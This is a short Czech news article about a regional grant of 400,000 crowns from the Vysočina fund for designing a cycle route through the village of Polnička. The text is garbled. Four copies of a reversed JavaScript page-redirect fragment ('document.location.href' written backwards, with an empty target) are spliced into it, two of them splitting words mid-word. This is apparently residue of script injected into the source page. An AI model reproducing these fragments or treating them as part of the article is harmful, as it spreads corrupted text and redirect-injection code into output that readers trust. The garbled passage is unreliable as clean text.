Rainbow page separator

Projekt na průtah Polničkou pro cyklisty podpoří dotace kraje

Středa, 20. července 2022

Polnička / Dotační podpora ve výši 400 tisíc korun z krajského Fondu Vysočiny pomůže Polničce při zadání a vypracování projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové dokumentace na cyklotrasu na průtahu obcí. Celková cena projektu včetně návrhu trasy a projednání s vlastníky pozemků, geodetického zaměření technické mapy, hydrogeologických průzkumů, rozpočtu a výkazů výměr byla vyčíslena na 700 tisíc korun bez DPH. Nová cyklotrasa má cyklisty bezpečně provést Polničkou.
Krajská dotace z Fondu Vysočiny, konkrétně z jeho programu podpory cyklodopravy a cykloturistiky pro rok 2022, by měla činit více než sedmačtyřicet procent z celkových nákladů na projekt. Kompletní dokumentace má být podle dotačních podmínek kraje finančně vypořádána nejpozději do konce lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu příštího roku.